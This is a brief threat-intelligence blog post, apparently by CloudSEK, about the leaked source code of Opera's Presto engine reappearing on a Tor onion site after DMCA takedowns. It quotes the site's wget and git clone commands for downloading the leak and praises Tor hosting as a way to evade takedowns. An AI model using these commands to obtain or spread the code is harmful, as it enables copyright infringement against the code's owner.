The source code of the proprietary tool named ‘Presto’, the browser layout engine formerly used by Opera, was leaked in January 2017 on the code-sharing site GitHub, and later on Bitbucket. Although Opera is widely perceived as open source, the layout engine it used earlier was a proprietary product of the Opera community.

The leak was taken down immediately through a DMCA takedown request filed by Opera; the complete packages were removed from multiple code-sharing platforms, including GitHub and Bitbucket.

Netizens expressed their opposition to the takedown of the Presto engine, voicing their wish for the product to be open-sourced on social media platforms like Reddit and other online forums; but no response came back.

 

BACK ON TOR

The whole repository of the Presto engine later came live on the Tor network, at http://xxxxxxxx5q5s4urp.onion/.

This onion site also provided a way to download the entire package (which is huge) using the following wget command:

wget -m http://xxxxxxxx5q5s4urp.onion/

In case an error occurs while mirroring/downloading the complete onion domain, the site also subdivided the repository by branch, in archive format (e.g. http://xxxxxxxx5q5s4urp.onion/browser.git/), so that the clone command can be used instead:

git clone http://xxxxxxxx5q5s4urp.onion/browser.git

During an investigation, it was found that the onion site had been created on 20th December 2017 and is hosted on an Nginx server. It was accessible only intermittently, which makes it unstable.

Hosting the leak on the dark web is a clever method to evade takedowns by the DMCA or other legal entities, as onion domains are hard to track and cannot be taken down unless attacked by means such as DDoS.

Presto was used by Opera until 2013, when the browser switched to the WebKit engine.

Although the source code is no longer in use, anyone can still reference it to analyze the methods used within the Opera community; future proprietary apps from Opera could be built using the same strategies.

CloudSEK is a Unified Risk Management Platform. Our AI/ML-based products, XVigil and CloudMon, monitor threats originating from the web, dark web, deep web, web applications, etc., and provide real-time alerts.